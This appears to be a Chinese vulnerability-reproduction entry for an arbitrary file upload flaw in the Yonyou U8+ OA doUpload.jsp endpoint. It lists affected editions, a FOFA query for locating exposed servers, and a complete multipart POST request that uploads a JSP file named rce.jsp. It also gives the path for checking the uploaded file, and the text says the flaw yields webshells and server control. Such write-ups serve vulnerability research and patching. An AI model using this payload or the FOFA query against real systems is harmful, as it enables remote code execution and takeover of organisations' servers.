Y15-1用友-U8+-文件上传
漏洞描述:
用友U8+ OA doUpload.jsp 接口存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个 web 服务器。
影响版本:
用友U8+OA 基础版+企业版
网站图片:
网络测绘:
fofa语法:
FOFA:“用友U8-OA” && body=“yyoa”
漏洞复现:
payload:
POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryb9CPBiwbTONqdE5v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Connection: close
------WebKitFormBoundaryb9CPBiwbTONqdE5v
Content-Disposition: form-data; name="myfile";filename="rce.jsp"
Content-Type: text/plain
<% out.println("Hello, World!"); %>
------WebKitFormBoundaryb9CPBiwbTONqdE5v—
效果图:
验证url
/yyoa/portal/upload/回显的文件名
RCE